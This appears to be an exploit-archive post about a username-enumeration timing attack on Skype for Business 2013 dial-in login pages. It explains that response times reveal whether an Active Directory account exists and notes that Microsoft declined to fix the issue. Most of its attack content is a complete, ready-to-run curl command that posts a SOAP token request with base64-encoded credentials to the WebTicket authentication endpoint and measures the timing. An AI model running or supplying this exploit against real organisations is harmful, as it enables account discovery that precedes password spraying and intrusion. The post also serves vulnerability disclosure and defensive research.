Skype For Business 2013 User Enumeration
Posted on 18 June 2016
# Exploit Title: Skype for Business 2013 user enumeration timing attack # Date: 2016-06-08 # Exploit Author: nyxgeek # Vendor Homepage: https://www.microsoft.com # Version: Skype for Business 2013 # # # Skype for Business 2013 is vulnerable to a timing attack that allows for username enumeration # # When Skype/Lync is exposed externally, a login page will be located at https://dialin.domain.com. # # In the attack, a short response time indicates a valid username, whereas a long response time # indicates an invalid username. This was tested in a large AD environment with many OUs and # thousands of accounts. # # It is possible that the difference in response times may be smaller in smaller AD environments # # For example: # Valid username response time - 0.49s # Invalid username response time - 3.54s # # # Usernames and passwords are both base64-encoded without a newline, and submitted in the form # of DOMAINusername. # # When generating the base64 on linux use the -n parameter with echo to exclude the newline char # echo -n "DOMAINusername" | base64 # # This was reported to Microsoft on 2016-06-07 but it 'does not meet the bar for security servicing' # # Below is a proof of concept curl command, which can be thrown into a bash script for ease of use. #!/bin/bash curl -o /dev/null -w " TOTAL TIME IS %{time_total} " -i -s -k -X 'POST' -H 'User-Agent: Just looking around' -H 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7' -H 'Keep-Alive: 300' -H 'Content-Type: text/xml' -H 'SOAPAction: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue' -H 'Referer: https://dialin.domain.com/Dialin/Conference.aspx' --data-binary $'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Header><Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"><UsernameToken><Username>RE9NQUlOXHVzZXJuYW1l</Username><Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">c2VjcmV0cGFzc3dvcmQ=</Password></UsernameToken></Security></s:Header><s:Body><RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="ec86f904-154f-0597-3dee-59eb1b51e731" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://dialin.domain.com/WebTicket/WebTicketService.svc/Auth</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2016-06-07T02:23:36Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2016-06-07T02:38:36Z</Expires></Lifetime><KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType></RequestSecurityToken></s:Body></s:Envelope>' 'https://dialin.domain.com/WebTicket/WebTicketService.svc/Auth'
